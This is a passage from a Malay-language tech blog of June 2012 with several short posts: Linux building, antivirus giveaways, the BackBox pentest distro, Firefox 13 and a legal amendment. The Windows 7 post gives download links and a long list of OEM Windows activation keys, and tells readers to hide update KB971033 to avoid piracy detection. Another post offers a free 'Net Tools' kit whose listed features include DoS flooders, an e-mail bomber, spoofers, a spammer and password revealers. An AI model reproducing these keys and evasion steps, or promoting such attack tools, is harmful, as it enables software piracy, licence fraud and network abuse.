Namun, siapa perekanya yang sebenar masih menjadi tanda tanya dan kemungkinan besar, virus ini mampu untuk mewujudkan perang siber.


07 June 2012

Membangunkan Sistem Pengoperasian Linux Sendiri




Assalamualaikum dan salam sejahtera kepada pembaca, hari ini anda akan bertemu lagi dengan tulisan rojak yerrr, betul kata Arya Putra kenapa anda tidak menjadi guest author je?? Mungkin banyak perkara yang anda tahu tetapi kami tidak tahu dan begitulah sebaliknya,
rasanya aku dah memenuhi kretiria nih:
1. Jangan guna kata singkatan
2. Tulis dengan bahasa yang matang
3. Biar ada satu dua gambar.
By Mr.Hac.

Ok, Pernahkah anda terfikir ingin membangunkan sistem pengoperasian Linux sendiri?? Kalau ya, disini ada jawapannya. Anda boleh membangunkan sistem pengoperasian Linux dengan menggunakan Suse Studio. Ia sungguh mudah digunakan tanpa perlu mempelajari bahasa pengaturacaraan. Anda boleh memilih jenis desktop samada GNOME,KDE dan macam-macam lagi.

Perkara yang paling penting dalam membangunkan sistem pengoperasian menggunakan Suse Studio 
ialah ianya percuma. Apa yang anda perlu lakukan ialah dengan mendaftarkan diri di Laman Rasminya Suse Studio dan waahhh anda boleh mulakan kerja anda. Anda juga boleh menambahkan beberapa perisian di dlm sistem pengopersian yang bakal anda buat, apa yang anda perlu lakukan ialah perlu explore je :P (cam salah je ayat aku guna).
Wokehhh Good Luck yerrr!!!

[Giveaway]ESET NOD32 ANTIVIRUS 6 MONTHS


Hari ini sungguh indah dapat barang percuma yang aku tunggu-tunggukan iaitu Eset Nod32,lesen 6bulan lama la jugak..kalau nak beli bukan nya mampu..

ESET NOD32 Antivirus 5 melindungi anda di peringkat yang tinggi,semasa anda dalam rangkaian sosial dunia atau bermain permainan dalam talian...ESET NOD32 Antivirus padat dengan teknologi pengesanan yang dipertingkatkan dan ciri-ciri keselamatan untuk anda..

Fungsi Eset Nod32:

Cloud Powered Scanning..
Based on real-time streaming of threat-related information from the cloud, the ESET Virus lab keeps the reputation services up-to-date for a constant level of protection against Internet threats...


Enhanced Media Control..
Block threats trying to get through to the system via removable media. ESET NOD32 Antivirus 5 automatically prompts you to scan the content of all USB flash drives, CDs and DVDs. Block specific media based on a range of parameters like the device ID, media type, and serial number...


Optimized Startup Procedure..
No more waiting for signature database download to complete – ESET NOD32 Antivirus 5 lets you start working on your computer immediately after booting, without compromising your security...

Ciri-ciri baru Eset Nod32:


Gamer Mode
When in full-screen mode, ESET NOD32 Antivirus 5 automatically switches to silent mode, which saves system resources, so you can enjoy playing computer games or concentrate on important work tasks without distractions from pop-up messages...


Advanced HIPS Functionality
This one is for real Geeks – now you can customize the behavior of the system in greater detail: specify rules for the system registry, active processes and programs, and fine-tune your security posture...



Advanced Setup Tree
Redesigned advanced setup tree for more intuitive and easier navigation...


Sistem operasi:


Processor Architecture..
i386 (Intel® 80386), amd64 (x86-64)..

Operating Systems..
Microsoft Windows NT4.0 SP6..
Microsoft Windows 2000..
Microsoft Windows XP..
Microsoft Windows Vista..
Microsoft Windows 7...
Microsoft Windows Home Server..

Giveaway:
1.Untuk mendapatkan lesen selama 6 bulan anda perlu ke laman promosi di http://promos.eset.es/tuenti/ dan isi butiran tersebut..Enjoy..







06 June 2012

Backbox Linux Untuk Ujian Penembusan


Salam sejahtera kepada pembaca,
aku tau lar aku punya penulisan teruk siap guna google translater agi .kok ye pom jgn lar kutuk aku LOL!!!Mulai ari nih aku trai guna bahasa aku sndiri(bahasa rojak).

Korang penah dgr x psal BackBox??
Mesti ada yg penah dgr dan ad yg belum pnah dgr.
Untuk pengetahuan korang backbox GNU/Linux berasaskan Ubuntu  nih lebih kurang je ngan backtrack iaitu untuk pentest.

Ia direka utk lebih laju, mudah digunakan dan meminumkan persekitaran desktop.Rilisan terbarunya iaitu Backbox Linux 2.05 berasaskan Ubuntu 11.04, Linux Kernel 2.6.38 dan Xfce 4.8.0.

Ciri-ciri terbaru untuk update 2.05:
  • System upgrade
  • Bug corrections
  • Performance boost
  • Improved start menu
  • Improved WiFi driver (compat-wireless aircrack patched)
  • New Hacking tools: creepy, fern-wifi-cracker, joomscan, pyrit, reaver, xplico, etc.
  • Updated tools: crunch, fimap, hydra, magictree, metasploit, set, sipvicious, skipfish, w3af, weevely, wireshark, wirouterkeyrec, wpscan, zaproxy, theharvester, xsser, etc.
Aku malas nk ckp byk kang korang kutuk aku plak,
kalo nk download tkan sni Backbox Linux 2.05

Firefox 13 Rilisan Stabil Kini Dilepaskan


Bagi para peminat Firefox, setiap rilisan stabil adalah perkara yang paling ditunggu-tunggu. Firefox semakin berevolusi ke arah yang lebih baik, dan ini adalah satu bonus buat peminat-peminatnya.


Dalam rilisan versi 13 ini, terdapat dua perubahan signifikan yang dapat dilihat pada Firefox. Perubahan yang pertama ialah Home/Start Page, yang boleh diakses dengan menaip 'about:home' pada bar URL.


Tetapan boleh diakses dengan mudah pada setiap ikon pintasan berwarna kelabu pada bahagian bawah Start Page tersebut. Perubahan kedua pula ialah pada New Tab Page, yang mana ia diubah dengan menambah Speed Dial (lihat pada video di atas). Speed Dial tersebut boleh di-pin, dibuang, atau dialihkan kedudukannya. Ia akan 'mempelajari' setiap laman yang anda kerapkali kunjungi. Cuma anda tidak dapat mengubah URL yang telah 'ditetapkan' oleh Speed Dial tersebut.

Bagi pengguna Windows, anda boleh kemaskini versi Firefox anda dengan menekan butang Help --> About Firefox. Untuk pengguna Ubuntu pula, kemaskini akan dimasukkan ke dalam repository rasmi dalam beberapa hari lagi. Jika anda tidak sabar, anda boleh cuba Security PPA ataupun muat turun Firefox pada laman web rasminya.

05 June 2012

Akta Keterangan (Pindaan) 2012


Assalamualaikum dan salam sejahtera kepada pembaca. Mungkin ramai yang telah tahu tentang akta pindaan 2012, tetapi ramai juga yang tidak tahu. Jadi ada baiknya kalau aku share kat sni.
Dengan media baru yang semakin popular, termasuk blog, Facebook dan Twitter, serta dalam usaha untuk menjadikan rakyat lebih bertanggungjawab terhadap aktiviti mereka di atas-talian, kini ia telah pun ditetapkan yang mana Akta Keterangan (Pindaan) 2012 bakal dikuat-kuasakan bermula esok, iaitu 1 Jun 2012.
Bagi yang tidak ketahui, melalui pindaan pada Akta Keterangan, ia menetapkan yang mana para pengguna Internet akan bertanggungjawab terhadap sebarang kandungan yang dihantar ke internet melalui rangkaian ataupun peranti mereka. Secara ringkasnya, sekiranya seseorang pengguna menghantar komen pada blog anda, halaman Facebook Page anda, tweetjack akaun Twitter anda, mahupun dengan “menumpang” talian WiFi anda, maka anda akan dipertanggungjawabkan terhadap sebarang perkara yang dikongsikan melaluinya.
Selain daripada itu, ia juga mengatakan yang mana sekiranya seseorang memulakan halaman Facebook, Twitter, blog mahupun sebarang perkara menggunakan nama dan gambar anda dan menerbitkan kandungan yang bertentangan dengan undang-undang serta memfitnah seseorang melaluinya, maka anda akan didapati bersalah, dan perlu membuktikan sebaliknya.
Anda mungkin akan menghadapi masalah sekiranya:
  • Anda mempunyai blog, dan seseorang pembaca menerbitkan komen, maka anda akan dianggap sebagai menerbitkan komen tersebut.
  • Anda mempunyai halaman Facebook Pages, dan seseorang pengguna menghantar komen atau menerbitkan sesuatu pada Wall, maka anda akan dianggap sebagai menerbitkannya.
  • Seseorang menggunakan tablet atau telefon pintar anda untuk menghantar sesuatu yang tidak baik, maka anda akan dianggap sebagai yang menerbitkannya.
  • Seseorang menggunakan komputer anda atau laptop anda untuk menerbitkan sesuatu pada internet, maka anda akan bertanggungjawab atasnya.
  • Seseorang menceroboh ke talian WiFi anda dan menghantar pelbagai perkara yang bertentangan dengan undang-undang di internet, maka anda akan bertanggungjawab ke atasnya.
  • …dan pelbagai perkara yang berkaitan.
Dalam arena digital dan elektronik ini, semestinya ia boleh dikatakan perkara ini salah satu perkara yang sukar untuk direalisasikan. Apatah lagi memandangkan pada halaman Facebook dan Twitter sesiapa sahaja boleh menggunakan nama dan gambar orang lain, dan berlakon seperti mereka.
Sebagai contoh, pada hari ini, akaun Facebook Pages untuk seseorang artis mahupun ahli politik sahaja, terdapat lebih daripada satu akaun untuk mereka, yang mana dimulakan oleh peminat dan juga penyokong. Sekadar perbandingan, akaun Facebook milik Najib Razak apabila dilakukan carian, secara kasar, terdapat lebih daripada 10 akaun, sekaligus menjadikan beliau bertanggungjawab terhadap kesemua akaun tersebut sekiranya sesuatu yang tidak sepatutnya diterbitkan, sehinggalah beliau membuktikan sebaliknya.
Jadi, secara ringkasnya, jagalah peranti dan rangkaian internet anda, disamping bertanggungjawab ke atas pelbagai perkara yang dikongsikan di arena internet, supaya ia tidak menyukarkan anda di kemudian hari.

P/S: Dimanakah yang dikatakan " Dunia Tanpa Sempadan " . Yang tidak bersalah menjadi mangsa juga ke ?? Hak kebebasan berinternet kita dirampas LOL!!!!

04 June 2012

Net Tools Perisian Pemantauan Keselamatan


Net Tools ialah perisian pemantauan keselamatan dan rangkaian untuk Internet dan Rangkaian Kawasan Tempatan, menyediakan pelanggan dengan keupayaan dan keyakinan untuk menghadapi cabaran teknologi esok. Agar seiring dengan trend industri, kami menawarkan peralatan profesional yang menyokong piawaian terkini, protokol, perisian, dan perkakasan bagi kedua-dua rangkaian berwayar dan tanpa wayar. Matlamat utama ialah penciptaan perisian yang berkualiti tinggi. Net Tools adalah kombinasi yang sangat kuat pengimbasan rangkaian, keselamatan, fail, sistem, dan alat pentadbir yang berguna dalam mendiagnosis rangkaian dan memantau PC anda dan sambungan rangkaian komputer untuk pentadbir sistem. Bersebelahan dengan alat teras penting ia termasuk banyak ciri-ciri tambahan yang berharga. Kit semua-dalam-satu ini termasuk juga banyak fail berguna dan utiliti sistem bersebelahan dengan jumlah besar alat rangkaian. Menu-menu sepenuhnya dikonfigurasikan, jadi dengan cara ini anda tidak akan hilang dalam jumlah yang amat besar alat penting. Semua ciri-ciri tambahan akan membuat permohonan ini mesti mempunyai untuk semua pentadbir sistem. Terdapat banyak membina dan berharga permohonan yang dimasukkan ke dalam Net Tools yang boleh digunakan untuk jumlah yang besar tujuan. Versi terbaru Net Tools adalah hibrid, ia bermakna bahawa ia mampu bekerja bersama-sama dengan permohonan yang dibuat dan direka untuk Net Tools, jadi dengan cara ini lebih banyak fleksibiliti dan kegunaan. Perisian ini direka untuk Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista, 7). Ia sepenuhnya serasi dan teliti telah diuji pada Windows XP.Dengan 175 alat ia adalah koleksi alat-alat yang berguna untuk pengguna rangkaian. Saiz Tools Bersih 5.0.70 adalah lebih kurang 25 Mb.

Antara Ciri-Ciri Alat ini ialah:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)


Anda boleh muat turun secara percuma di sini

03 June 2012

Windows 7 + Key


Assalamualaikum dan salam sejahtera. Artikel Windows 7 ini diminta oleh seseorang yang bernama tiada nama berkata..... Sebenarnya sudah ada di dalam entri yang lepas2 tapi disebabkan permintaan beliau jadi saya tunaikan. :). Seperti yang kita semua tahu bahawa Windows 7 merupakan suatu sistem pengoperasian yang paling ramai yang digunakan buat masa kini dikeluarkan oleh Microsoft.
Ramai orang menghadapi masalah dgn harga windows yang melambung tinggi,
hari ini saya ada penyelesaian utk masalah anda
jika anda ingin mengubah versi asal OS anda kepada windows 7 boleh download di link bawah mengikut kehendak anda






Windows 32 bit:
 Windows 7 Proffesional
Windows 7 Home Premium
  Windows 7 Ultimate
Windows 7 64 bit:
windows 7 Proffesional
 Windows 7 Home Premium
 windows 7 Ultimate

Selepas anda memasang windows pada komputer anda
anda boleh mengaktifkannya dgn menggunakan cd-key di bawah ini
pilih yg mana sesuai mengikut versi yg anda gunakan dan juga jenama PC anda

Vista|Ultimate|Acer| 3YDB8-YY3P4-G7FCW-GJMPG-VK48C
Vista|Ultimate|Advent| 39MVW-K8KKQ-BGJ9B-24PMW-RYQMV
Vista|Ultimate|Alienware| 7QVFM-MF2DT-WXJ62-XTYX3-P9YTT
Vista|Ultimate|Asus| 6F2D7-2PCG6-YQQTB-FWK9V-932CC
Vista|Ultimate|Dell|2QBP3-289MF-9364X-37XGX-24W6P
Vista|Ultimate|DixonXP|6JPQR-4G364-2B7P7-83FXW-DR8QC
Vista|Ultimate|Gateway|6P8XK-GDDTB-X9PJQ-PYF36-G8WGV
Vista|Ultimate|Hedy|7R2C3-DWCBG-C8G96-MPT8T-K37C7
Vista|Ultimate|HP|23CM9-P7MYR-VFWRT-JGH7R-R933G
Vista|Ultimate|Lenovo|24J6Q-YJJBG-V4K4Q-2J8HY-8HBQQ
Vista|Ultimate|OQO|C4QGV-XHYYT-9PW8R-DCFTQ-FBD6M
Vista|Ultimate|Toshiba|33G3W-JY3XQ-CQQ7C-TG96R-R6J6Q
Vista|Ultimate|Sony|2KKTK-YGJKV-3WMRR-3MDQW-TJP47
Vista|Business|Acer|2TJTJ-C72D7-7BCYH-FV3HT-JGD4F
Vista|Business|Asus|72PFD-BCBK8-R7X4H-6F2XJ-VVMP9
Vista|Business|Dell|368Y7-49YMQ-VRCTY-3V3RH-WRMG7
Vista|Business|Fujitsu|4C3CM-H3RXM-VBMVQ-K8RHX-RTFX8
Vista|Business|Gateway|9GK24-BJJPV-93JB4-9CD3T-QTHDD
Vista|Business|HP|2Q2WM-VCB98-8C6BG-C9BT2-3XDRY
Vista|Business|Lenovo|2YRV9-YCY3F-FRJ4T-BKD6B-C47PP
Vista|Business|MSI|2X4F8-Y4QGK-Y8RTT-CK6PB-M8X92
Vista|Business|OQO|KBK7F-XCVK4-9W477-GPFVC-YXFDM
Vista|Business|Sony|3W2Y2-GRRYB-VH76X-KPDXX-XFJ4B
Vista|Business|Toshiba|38MK6-4QYC6-GJQQX-9DYQ4-H9MQD
Vista|BusinessN|Acer|2434H-HFRM7-BHGD4-W9TTD-RJVCH
Vista|HomeBasic|Acer|2W7FD-9DWCB-Q9CM8-KTDKK-8QXTR
Vista|HomeBasic|Asus|762HW-QD98X-TQVXJ-8RKRQ-RJC9V
Vista|HomeBasic|Benq|7R997-DXYDR-YGCR3-RHVDP-T8TKX
Vista|HomeBasic|CHS|2QM7G-GTFJ4-2DTTG-R73YR-W3D8G
Vista|HomeBasic|Dell|3YMR2-WMV49-4WD8X-M9WM7-CH4CG
Vista|HomeBasic|Fujitsu|4G8P7-TVW66-Y3H3V-C4Q4J-CQR2B
Vista|HomeBasic|Gateway|7Q3BC-897QP-6HVMF-TTJ34-P92J4
Vista|HomeBasic|Gericom|MDRBF-FKHJB-6J8RV-P4GKQ-G6BR8
Vista|HomeBasic|Gigabyte|889T3-F4VGX-QK4V7-JH76R-3HHRC
Vista|HomeBasic|HP|2VX48-BVXT6-GD2PK-BD3R2-44MV3
Vista|HomeBasic|Ksystem-Irbis|J2QKK-V8M3X-WRPPT-FBW4B-FQ6FP
Vista|HomeBasic|Lenovo|2WP98-KHTH2-KC7KG-4YR37-H8PHC
Vista|HomeBasic|LG|6DT3K-TCY4G-Y2VK9-T8J3T-2RGT7
Vista|HomeBasic|Mecer|C3MXB-T6PGC-2M2XV-C6PRX-TPW79
Vista|HomeBasic|Medion|3XFY9-7GTXV-93RXP-V62MQ-84WP6
Vista|HomeBasic|NEC|2432B-Q9RGP-VT9CK-64JFP-X6XVT
Vista|HomeBasic|Packard Bell|4GW2B-QCB6W-BWTVG-2DDKY-KRDMH
Vista|HomeBasic|Rover|BMHBK-PJD8J-WDWGY-Q4D6Q-46YJP
Vista|HomeBasic|Samsung|27WDG-2G9G2-BTVMF-W4KCX-9F8PX
Vista|HomeBasic|Sony|4DWY4-M6VH9-Y6FX6-D2H3V-3PXM9
Vista|HomeBasic|Toshiba|4DV48-MFJR8-VRW92-3VTYM-HBTPB
Vista|HomeBasic|Trigem|2YY8K-6KVM4-3DTT6-XRFHK-RYYDG
Vista|HomeBasicN|Acer|22TC9-RDMDD-VXMXD-2XM2Y-DT6FX
Vista|HomePremium|Acer|2TYBW-XKCQM-XY9X3-JDXYP-6CJ97
Vista|HomePremium|Alienware|D9CRD-R8YYQ-VYG3W-YG4FK-2CXRF
Vista|HomePremium|Asus|8XPM9-7F9HD-4JJQP-TP64Y-RPFFV
Vista|HomePremium|Dell|4GPTT-6RYC4-F4GJK-KG77H-B9HD2
Vista|HomePremium|DixonXP|7VJMY-XWBMV-T3PCK-3FRWY-KKMRQ
Vista|HomePremium|Everex|BH3M9-MQPD8-PTPDK-T6DWK-B2XFW
Vista|HomePremium|Founder|C6KM8-8JDBT-QBRM8-2MGFH-XH7QY
Vista|HomePremium|Fujitsu|6M66G-C2BGD-XGBBV-2BHKV-C9KM3
Vista|HomePremium|Gateway|6DX2X-QR7XB-3RBY2-BGQ2R-DR9M6
Vista|HomePremium|HP|HW7V9-XYT4W-PFR9Q-2DKGJ-RR4TD
Vista|HomePremium|iQon|6R99P-3HY62-7XR3F-WGP2T-HKCB9
Vista|HomePremium|Kohjinsha|HRCXG-RQPBQ-YBP92-KFFRY-JKQQ3
Vista|HomePremium|Ksystem-Irbis|7QVBM-X4KG7-QCWDP-YC8PQ-PXKH8
Vista|HomePremium|Lenovo|34BKK-QK76Y-WWR7C-QF2M7-2TB37
Vista|HomePremium|LG|73JC4-PR3R6-9DKYC-FDG3K-3FTT3
Vista|HomePremium|Medion|4FG94-MMYPT-H2QD2-V4DCP-X7QB8
Vista|HomePremium|MeshPC|HR3TD-CH9JD-CT8WF-X948R-C3QR3
Vista|HomePremium|MSI|86C2J-2M84W-HBMRQ-GBJWJ-VPTRM
Vista|HomePremium|NEC|22CTR-JFKJJ-BMXQK-XKXBC-C8R98
Vista|HomePremium|Optima|863XK-7RW2B-6R8CR-4FYQV-3FTW8
Vista|HomePremium|Packard Bell|6PFJK-WKXQR-9Q27C-6CWD7-MQ3CQ
Vista|HomePremium|Paradigit|6DX4V-3CJX6-97XGD-KW4C2-PVRRK
Vista|HomePremium|Powerspec|CK82T-QVTHF-8HGMF-9F3G9-FJH92
Vista|HomePremium|Quanmax|88XKM-J69QV-VB9M9-QCM66-647KW
Vista|HomePremium|Samsung|2MQH8-77KBM-PRTT7-HVDWW-DCXVT
Vista|HomePremium|Sony|6JWV3-843DD-4GV68-6D8JB-G6MF9
Vista|HomePremium|Targa|6VJ7B-3KTJH-H3DDQ-7JD7G-26VMG
Vista|HomePremium|TCL|BH626-XT3FK-MJKJH-6GQT2-QXQMF
Vista|HomePremium|Toshiba|6DG3Y-99KMR-JQMWD-2QJRJ-RJ34F
Vista|HomePremium|Velocity|GCHCQ-WTYXJ-GDJBC-JYDCX-F9VXW
Vista|Starter|Acer|26VQB-RP3T9-63FVV-VD7RF-H7M2Q
Vista|Starter|Lenovo|23Q4W-YQPHY-TY89Y-7Q3VX-W72KT
Server|ServerEnterprise|Dell|BKCJJ-J6G9Y-4P7YF-8D4J7-7TCWD
Server|ServerStandard|Dell|D7TCH-6P8JP-KRG4P-VJKYY-P9GFF
Server|ServerWinFoundation|Dell|VMYRB-8BRVQ-KXWFF-334J3-F2WHJ
Server|SBS|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2
Server|Business|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2
Server|Enterprise|Dell|26Y2H-YTJY6-CYD4F-DMB6V-KXFCQ
Server|Standard|Dell|223PV-8KCX6-F9KJX-3W2R7-BB2FH
7|Ultimate|Acer|FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
7|Ultimate|Alienware|VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD
7|Ultimate|Asus|2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G
7|Ultimate|Dell|342DG-6YJR8-X92GV-V7DCV-P4K27
7|Ultimate|HP|MHFPT-8C8M2-V9488-FGM44-2C9T3
#7|Ultimate|Lenovo 2|22TKD-F8XX6-YG69F-9M66D-PMJBM
7|Ultimate|Lenovo|6K2KY-BFH24-PJW6W-9GK29-TMPWP
7|Ultimate|Samsung|49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD
7|Ultimate|Sony|YJJYR-666KV-8T4YH-KM9TB-4PY2W
7|Professional|Acer|YKHFT-KW986-GK4PY-FDWYH-7TP9F
7|Professional|Asus|2WCJK-R8B4Y-CWRF2-TRJKB-PV9HW
7|Professional|Dell|32KD2-K9CTF-M3DJT-4J3WC-733WD
7|Professional|Fujitsu|PT9YK-BC2J9-WWYF9-R9DCR-QB9CK
7|Professional|HCL|2QTV2-3CMPP-FQBYK-GRD62-D7XMW
7|Professional|HP|74T2M-DKDBC-788W3-H689G-6P6GT
7|Professional|Lenovo|237XB-GDJ7B-MV8MH-98QJM-24367
7|Professional|Samsung|GMJQF-JC7VC-76HMH-M4RKY-V4HX6
7|Professional|Sony|H9M26-6BXJP-XXFCY-7BR4V-24X8J
7|Professional|Toshiba|2V8P2-QKJWM-4THM3-74PDB-4P2KH
7|Professional|Wortmann|6JKVQ-WJTWW-JVPRB-77TGD-2DV7M
#7|Professional|????|862R9-99CD6-DD6WM-GHDG2-Y8M37
#7|HomePremium|Asus 2|7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG
7|HomePremium|Acer|VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7
7|HomePremium|Advent|38JTJ-VBPFW-XFQDR-PJ794-8447M
7|HomePremium|Alienware|V3Y2W-CMF9W-PGT9C-777KD-32W74
7|HomePremium|Asus|2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR
7|HomePremium|Dell|6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82
7|HomePremium|Fujitsu|C6MHH-TRRPT-74TDC-FHRMV-XB88W
7|HomePremium|HCL|39QDH-D7MHH-WDMTD-TM2R9-KM7DB
7|HomePremium|HP|4FG99-BC3HD-73CQT-WMF7J-3Q6C9
7|HomePremium|Lenovo|27GBM-Y4QQC-JKHXW-D9W83-FJQKD
7|HomePremium|LG|38GRR-KMG3D-BTP99-TC9G4-BBDJJ
7|HomePremium|Medion|2P2P9-CM3F8-FTV6P-PC7CX-8TFF7
7|HomePremium|MSI|4G3GR-J6JDJ-D96PV-T9B9D-M8X2Q
7|HomePremium|Packard Bell|VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7
7|HomePremium|Samsung|CQBVJ-9J697-PWB9R-4K7W4-2BT4J
7|HomePremium|Siragon|HWDFB-YVFG4-3TJ7F-Q3WMT-7B6PH
7|HomePremium|Sony|H4JWX-WHKWT-VGV87-C7XPK-CGKHQ
7|HomePremium|Toshiba|6B88K-KCCWY-4F8HK-M4P73-W8DQG
#7|HomePremium|Toshiba 2|6GF36-P4HWR-BFF84-6GFC2-BWX77
#7|HomePremium|????|2P2P9-CM3F8-FTV6P-PC7CX-8TFF7
7|HomeBasic|Acer|MB4HF-2Q8V3-W88WR-K7287-2H4CP
7|HomeBasic|Asus|89G97-VYHYT-Y6G8H-PJXV6-77GQM
7|HomeBasic|Dell|36T88-RT7C6-R38TQ-RV8M9-WWTCY
7|HomeBasic|HP|DX8R9-BVCGB-PPKRR-8J7T4-TJHTH
7|HomeBasic|Lenovo|22MFQ-HDH7V-RBV79-QMVK9-PTMXQ
7|HomeBasic|Samsung|2P6PB-G7YVY-W46VJ-BXJ36-PGGTG
7|HomeBasic|Sony|YV7QQ-RCXQ9-KTBHC-YX3FG-FKRW8
7|HomeBasic|Tongfang|9DBMT-GXRWM-6Q9Y3-WMYM8-FJCBW
7|HomeBasic|Toshiba|9H4FH-VD69Y-TGBD2-4PM4K-DRMMH
7|Starter|Acer|RDJXR-3M32B-FJT32-QMPGB-GCFF6
7|Starter|Asus|6K6WB-X73TD-KG794-FJYHG-YCJVG
7|Starter|Casper ERA|6PB94-MC2C6-4F37H-KTJ32-PF2PT
7|Starter|Dell|36Q3Y-BBT84-MGJ3H-FT7VD-FG72J
7|Starter|HP|RH98C-M9PW4-6DHR7-X99PJ-3FGDB
7|Starter|Lenovo|273P4-GQ8V6-97YYM-9YTHF-DC2VP
7|Starter|MSI|2W4DJ-JFFJV-DMCPP-2C3X8-883DP
7|Starter|Nokia|2XGHP-9TQK2-8CF28-BM2P2-8FRX8
7|Starter|Sony|32J2V-TGQCY-9QJXP-Q3FVT-X8BQ7
7|Starter|Toshiba|TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ
7|Starter|Viliv|7W842-2HCPJ-BC3MJ-B79K6-TD2HQ

Ok selepas pasang windows, anda perlu check update
dan seterusnya hide update Windows 7 (KB971033)
kerana ianya akan mengesan windows anda adalah pirate.
ok selamat mencuba, jika ada sebarang pertanyaan boleh comment di bawah yee...~~~



P/S: Goood Luucckkk!!

[Giveaway] Windows 8 and free Product Key


Window 8 dianggap sebagai perubahan yang terbesar dalam beberapa dekad untuk sistem operasi Microsoft...Versi terkini,Windows 8 boleh didapati dalam 14 bahasa termasuk beberapa penambahbaikan dan ciri-ciri yang menggerunkan...Microsoft menaik taraf termasuk lebih banyak cara untuk menyambung ke perkhidmatan Microsoft yang lain, kawalan keselamatan yang lebih banyak..

